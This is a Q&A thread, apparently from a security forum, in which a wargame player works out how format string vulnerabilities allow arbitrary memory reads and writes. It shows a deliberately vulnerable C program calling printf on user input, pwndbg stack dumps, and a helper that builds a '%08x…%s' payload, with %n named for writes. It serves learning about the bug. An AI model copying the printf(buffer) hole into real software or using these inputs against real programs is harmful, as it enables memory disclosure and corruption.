
While playing various wargames I noticed that I kept getting stuck on format string vulnerabilities, so I decided to step back and relearn them from scratch. In the process I realized that I couldn't explain to myself why we can read from / write to arbitrary locations by providing a valid address.

printf ("\x41\x41\x41\x41_%08x_%08x");

According to my understanding of format strings, this function call is supposed to simply print AAAA followed by two stack values and nothing else. Instead, it leaks two values starting from the provided address.

From https://crypto.stanford.edu/cs155old/cs155-spring08/papers/formatstring-1.2.pdf

The format function now parses the format string ‘A’, by reading a
character a time. If it is not ‘%’, the character is copied to the output. In
case it is, the character behind the ‘%’ specifies the type of parameter that
should be evaluated. The string “%%” has a special meaning, it is used to print
the escape character ‘%’ itself. Every other parameter relates to data, which
is located on the stack

If the above statement is true, and \x41\x41\x41\x41_%08x_%08x is the only argument of printf() placed on the stack, then how can we explain reading from / writing to arbitrary memory locations?

EDIT 1:

This answer does indeed specify that we can leak whatever address we want, but it doesn't go over how to start leaking from an arbitrary memory location.

In this other answer:

So you're asking how printf can find the string because there is a
different parameter count than the % signs say? Two thought problems here: a)
Before printf can count the % at all, it has to find the string. Wrong string
content can't prevent finding this string. b) Without attacks: printf supports
variable parameter counts, and it always can find the string. Last parameter
etc. doesn't matter.

For some reason the OP assumes that the 'AAAA' part is an actual address.

shxdow

1 Answer


@LiveOverflow helped me figure out what I was missing. Both of the assumptions I had were true:

  1. printf simply prints whatever isn't a '%' and treats the characters following a '%' in a special way.
  2. Format specifiers (%x, %s, %n, etc.) ONLY use values found on the stack. What I mean is that if we start popping off values using %x, those values are taken from the stack one after another, and %s and %n treat the value they pop as an address.
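The two points above can be sketched with a toy formatter. This is not the real printf: mini_format is a hypothetical helper that only understands %x and %%, and it is written just to show that each specifier makes the function fetch "the next argument" without checking whether the caller actually passed one. The real printf does the same fetch, which on a 32-bit stack-based calling convention means reading whatever sits next on the stack.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper, NOT the real printf: walks the format string one
 * character at a time and pulls one argument for every %x it meets. */
int mini_format(char *out, size_t size, const char *fmt, ...)
{
    va_list ap;
    size_t used = 0;

    if (size == 0)
        return 0;

    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0' && used + 1 < size; p++) {
        if (*p != '%') {
            out[used++] = *p;               /* ordinary character: copy it */
        } else if (p[1] == '%') {
            out[used++] = '%';              /* "%%" prints a single '%' */
            p++;
        } else if (p[1] == 'x') {
            /* Fetch the next argument. Nothing here verifies that the
             * caller really supplied it. */
            unsigned int value = va_arg(ap, unsigned int);
            int n = snprintf(out + used, size - used, "%08x", value);
            if (n < 0 || (size_t)n >= size - used)
                break;                      /* would not fit: stop */
            used += (size_t)n;
            p++;
        } else {
            out[used++] = *p;               /* unsupported: copy '%' as-is */
        }
    }
    va_end(ap);

    out[used] = '\0';
    return (int)used;
}
```

Calling mini_format(out, sizeof out, "AAAA_%x_%x", 0xdeadbeefu, 0x41414141u) copies AAAA_ verbatim and then formats the two supplied values. Passing the same format string with no extra arguments would be undefined behavior in C, and that is exactly the situation printf (buffer) creates.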

Now, for the code in the question, supplying an address as the first argument is not enough: we have to somehow put the address we want to read from or write to on the stack.

example:

vuln.c (gcc -g vuln.c -m32 -o vuln):

#include <stdio.h>

int main (int argc, char ** argv) {

    char buffer[32];

    fgets (buffer, sizeof(buffer), stdin);

    printf (buffer);

    return 0;
}

We can do that by calling the program with an argument: ./vuln AAAA. When asked for input, we enter our format string. Here's the catch: we have to pop values off until we reach our AAAA; a %s at that point would treat 0x41414141 as an address and read a string from there, i.e. read from an arbitrary address. Writing to an address with %n works in exactly the same way.
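The "pop until we reach it, then dereference" input can be sketched as a small string builder. build_read_format and its slot parameter are hypothetical names, not part of vuln.c: slot is the 1-based position of the stack word we want %s to use, and it has to be found by experiment (for example with the debugger).

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: writes (slot - 1) copies of "%08x" followed by "%s"
 * into out. Returns the length of the string, or -1 if slot is 0 or the
 * result does not fit in size bytes (including the terminating NUL). */
int build_read_format(char *out, size_t size, unsigned int slot)
{
    static const char pop[] = "%08x";   /* consumes one stack word */
    static const char deref[] = "%s";   /* treats the next word as a pointer */
    const size_t pop_len = sizeof pop - 1;
    const size_t deref_len = sizeof deref - 1;

    if (slot == 0 || size < deref_len + 1)
        return -1;

    size_t pops = slot - 1;
    if (pops > (size - deref_len - 1) / pop_len)
        return -1;                      /* not enough room */

    char *p = out;
    for (size_t i = 0; i < pops; i++) {
        memcpy(p, pop, pop_len);
        p += pop_len;
    }
    memcpy(p, deref, deref_len + 1);    /* copies the NUL as well */

    return (int)(pops * pop_len + deref_len);
}
```

With slot set to 3 this produces %08x%08x%s. Note that fgets in vuln.c reads at most 31 characters into the 32-byte buffer, so only a handful of pops fit in a single input built this way.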

For the sake of simplicity I compiled it with -g so that I could use the *argv symbol

pwndbg> x/4s *argv
0xffffd258: "/home/ncrntn/vu"...
0xffffd267: "ln"
0xffffd26a: "AAAA"
0xffffd26f: "XDG_CONFIG_DIRS"...

At this point we know where to look

pwndbg> x/200wx $esp
. . .
0xffffd260: 0x6e746e72  0x6c75762f  0x4141006e  0x58004141
. . .

And we indeed found our AAAA (in hex \x41\x41\x41\x41)
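To read the dump row above byte by byte, the words can be unpacked in little-endian order, which is how x86 stores them. The sketch below uses two hypothetical helpers (words_to_bytes and find_bytes) and takes the four word values from the x/200wx row at 0xffffd260 as input.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Spread 32-bit words into bytes, least significant byte first
 * (little-endian). out must hold 4 * count bytes. */
void words_to_bytes(const uint32_t *words, size_t count, unsigned char *out)
{
    for (size_t i = 0; i < count; i++)
        for (size_t b = 0; b < 4; b++)
            out[4 * i + b] = (unsigned char)((words[i] >> (8 * b)) & 0xffu);
}

/* Return the offset of the first occurrence of needle in hay, or -1. */
long find_bytes(const unsigned char *hay, size_t hay_len,
                const char *needle, size_t needle_len)
{
    if (needle_len == 0 || needle_len > hay_len)
        return -1;
    for (size_t i = 0; i + needle_len <= hay_len; i++)
        if (memcmp(hay + i, needle, needle_len) == 0)
            return (long)i;
    return -1;
}
```

Fed with 0x6e746e72, 0x6c75762f, 0x4141006e and 0x58004141, the bytes come out as "rntn/vuln", a NUL, then "AAAA" at offset 10, which matches the address 0xffffd26a reported by x/4s. Offset 10 is not a multiple of 4, so in this particular run the four A bytes straddle two stack words (0x4141006e and 0x58004141), and no single %x or %s would see 0x41414141 as one value. A common way around this is to add padding characters to the argument until the value lands on a 4-byte boundary.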

shxdow